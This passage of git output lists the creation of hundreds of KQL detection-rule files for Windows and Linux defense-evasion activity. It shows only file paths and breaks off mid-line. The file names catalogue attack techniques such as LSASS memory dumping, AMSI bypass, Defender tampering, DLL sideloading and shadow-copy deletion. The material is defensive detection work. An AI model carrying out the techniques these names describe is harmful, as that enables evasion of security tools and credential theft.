KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql create mode 100644 KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql create mode 100644 KQL/rules/Defense Evasion/msiexec_quiet_installation.kql create mode 100644 KQL/rules/Defense Evasion/msiexec_web_install.kql create mode 100644 KQL/rules/Defense Evasion/msxsl_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql create mode 100644 KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_file_association_using_exefile.kql create mode 100644 KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/node_process_executions.kql create mode 100644 KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql create mode 100644 KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql create mode 100644 KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql create mode 100644 KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql create mode 100644 KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql create mode 100644 KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql create mode 100644 KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql create mode 100644 
KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql create mode 100644 KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql create mode 100644 KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql create mode 100644 KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql create mode 100644 KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql create mode 100644 KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql create mode 100644 KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql create mode 100644 KQL/rules/Defense Evasion/ping_hex_ip.kql create mode 100644 KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql create mode 100644 KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql create mode 100644 KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql create mode 100644 KQL/rules/Defense 
Evasion/potential_attachment_manager_settings_attachments_tamper.kql create mode 100644 KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql create mode 100644 KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql create mode 100644 KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql create mode 100644 KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql create mode 100644 KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql create mode 100644 KQL/rules/Defense 
Evasion/potential_dll_sideloading_of_dbghelp_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql create mode 100644 KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql create mode 100644 KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql create mode 100644 KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql create mode 100644 KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql create mode 100644 KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql create mode 100644 KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql create mode 100644 KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql create mode 100644 KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql create mode 100644 KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql create mode 100644 KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql create mode 100644 KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql 
create mode 100644 KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql create mode 100644 KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql create mode 100644 KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql create mode 100644 KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql create mode 100644 KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql create mode 100644 KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql create mode 100644 KQL/rules/Defense 
Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql create mode 100644 KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql create mode 100644 KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql create mode 100644 KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql create mode 100644 KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql create mode 100644 KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql create mode 100644 KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql create mode 100644 KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql create mode 100644 KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql create mode 100644 KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql create mode 100644 KQL/rules/Defense 
Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql create mode 100644 KQL/rules/Defense 
Evasion/potentially_suspicious_wuauclt_network_connection.kql create mode 100644 KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql create mode 100644 KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql create mode 100644 KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_exclusion.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql create mode 100644 KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql create mode 100644 KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql create mode 100644 KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql create mode 100644 KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql create mode 100644 KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/prefetch_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/procdump_execution.kql create mode 100644 KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql create mode 100644 KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql create mode 100644 KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql create mode 100644 KQL/rules/Defense Evasion/process_launched_without_image_name.kql create mode 100644 KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql create mode 100644 KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql create mode 100644 KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql create 
mode 100644 KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql create mode 100644 KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql create mode 100644 KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_defendercheck_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql create mode 100644 KQL/rules/Defense Evasion/pua_process_hacker_execution.kql create mode 100644 KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql create mode 100644 KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql create mode 100644 KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql create mode 100644 KQL/rules/Defense Evasion/raccine_uninstall.kql create mode 100644 KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql create mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql create mode 100644 KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql create mode 100644 KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql create mode 100644 KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql create mode 100644 KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql create mode 100644 KQL/rules/Defense 
Evasion/registry_persistence_via_service_in_safe_mode.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql create mode 100644 KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql create mode 100644 KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql create mode 100644 KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql create mode 100644 KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql create mode 100644 KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql create mode 100644 KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql create mode 100644 KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql create mode 100644 KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql create mode 100644 KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_megasync_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql create mode 100644 KQL/rules/Defense 
Evasion/renamed_msdt_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_office_binary_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_plink_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_procdump_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql create mode 100644 KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql create mode 100644 KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql create mode 100644 KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_internet_connection.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql create mode 100644 KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql create mode 100644 KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql create mode 100644 KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/scr_file_write_event.kql create mode 100644 KQL/rules/Defense Evasion/screensaver_registry_key_set.kql create mode 100644 KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql create mode 100644 KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql create mode 100644 KQL/rules/Defense Evasion/sdclt_child_processes.kql 
create mode 100644 KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql create mode 100644 KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql create mode 100644 KQL/rules/Defense Evasion/setuid_and_setgid.kql create mode 100644 KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql create mode 100644 KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql create mode 100644 KQL/rules/Defense Evasion/space_after_filename_macos.kql create mode 100644 KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql create mode 100644 KQL/rules/Defense Evasion/suspect_svchost_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_calculator_usage.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql create mode 100644 
KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_double_extension_files.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql create mode 100644 KQL/rules/Defense 
Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql create mode 100644 KQL/rules/Defense 
Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_parents.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_start_locations.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_service_installed.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql create mode 100644 KQL/rules/Defense 
Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql create mode 100644 KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql create mode 100644 KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_configuration_update.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql create 
